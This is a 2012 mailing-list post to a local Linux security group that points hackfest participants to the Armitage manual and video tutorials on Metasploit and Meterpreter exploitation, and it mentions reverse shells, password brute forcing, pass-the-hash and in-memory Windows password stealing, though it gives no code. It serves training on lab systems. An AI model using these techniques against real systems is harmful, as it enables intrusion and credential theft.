[Plug-security] Step X Step Solutions for December's hackfest (Armitage/MetaSploit/Meterpreter)

Lisa Kachold lisakachold at obnosis.com
Sat Dec 8 19:17:44 MST 2012


We have concentrated on network and client side attacks over the last
couple of months, using tools like metasploit/armitage (with all of the
plugins) including nmap and meterpreter).  However we mutter and wander
when get to the actual exploitation with Metasploit/Armitage.  We therefore
provide some good examples below:

Armitage Manual:  Pay Special Atention to Section 5 Exploitation and
Meterpreter General Payload.  Section 7.6 shows how to do passwd brute
forcing (for ssh/ftp for instance):
http://www.fastandeasyhacking.com/manual#4

Armitage tutorial for beginners (if you watch nothing else, this will help
you learn):
http://www.youtube.com/watch?v=hbtkKEiYGrw

The following is an example of a full attack using Armitage/Metasploit (all
of this was possible with the ftp attack on XP today):
Munge 2011 on Hak5: http://www.youtube.com/watch?v=Z0x_O75tRAU
skip forward to 8:30
skip forward to 11:50 for actual session interaction
25:00 pass the hash attack (get adjacent domain servers)

Here's another screen X screen use of Armitage:
http://www.youtube.com/watch?v=AG_MeOsnQwM
Remember Hosts Graphic turns red when successful!
Use the meterpreter menu to get a session in Windows

Munge 2012 using new options in Armitage and Metasploit 4:
http://www.youtube.com/watch?v=kC3wpe3t_qg

Setting up and using Armitage/Metasploit on Windows:
http://www.youtube.com/watch?v=EmDQnavYFgI

*A reverse shell WAS available on 2 of our systems, if we set a payload for
it:*

Stealing Windows Passwords with Metasploit (Smartlocker)  [winlogin.exe]
hook (sly - all in memory) requires administrator to invoke (auto bgrun in
background):
http://www.youtube.com/watch?v=vC6wmmgp20M
skip forward to 10:50 / 12:30
(railgun grab to windows api)

Questions?  Discussion?


See you on the 2nd Saturday of the Month at DeVry University 11-2PM.
-- 

(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
it-clowns.com
Chief Clown
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.phxlinux.org/pipermail/plug-security/attachments/20121208/ac987203/attachment.html>


More information about the Plug-security mailing list